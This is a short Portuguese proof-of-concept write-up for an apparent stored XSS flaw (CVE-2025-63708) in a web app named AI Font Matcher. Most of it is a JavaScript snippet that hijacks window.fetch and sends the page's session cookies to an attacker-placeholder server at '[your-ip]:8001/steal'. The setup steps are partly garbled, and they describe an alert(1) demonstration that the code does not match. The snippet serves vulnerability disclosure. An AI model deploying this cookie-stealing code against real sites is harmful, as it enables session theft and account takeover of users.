
Prova de conceito de exploit para CVE-2025-63708, uma vulnerabilidade de XSS armazenado no AI Font Matcher. Demonstra roubo de cookies de sessão através de nomes de família de fonte não sanitizados em respostas de fetch de webfonts.
ID CVE: CVE-2025-63708
Atribuído: 11-12-2025
Tipo de Problema: CWE-79 (Cross-Site Scripting)
Produto Afetado: “AI Font Matcher” (publicado em 2025-10-10, nid=18425)
Página do Produto: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Data da Descoberta: 2025-10-11
Pesquisador: Dylan Davis
A aplicação processa dados de uma requisição webfonts sem sanitizar os nomes das famílias de fontes. Um atacante que controle ou intercepte essa resposta pode injetar JavaScript que é executado no contexto da página, permitindo o roubo de cookies de sessão e a tomada de contas.
Este PoC demonstra a execução de código interceptando window.fetch e retornando um payload controlado de Web Fonts.
poc.js).webfonts; observe um alert(1).window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
const url = (typeof input === 'string') ? input : input?.url;
if (url && url.includes('webfonts')) {
// Exfiltrate cookie to your server
fetch('http://[your-ip]:8001/steal?cookie=' +
encodeURIComponent(document.cookie))
.catch(e => console.log('Exfil failed:', e));
return new Response(JSON.stringify({
kind: "webfonts#webfontList",
items: [{ family: "Playfair Display", category: "serif" }]
}), {
status: 200,
headers: {'Content-Type': 'application/json'}
});
}
return window.__origFetch.apply(this, arguments);
};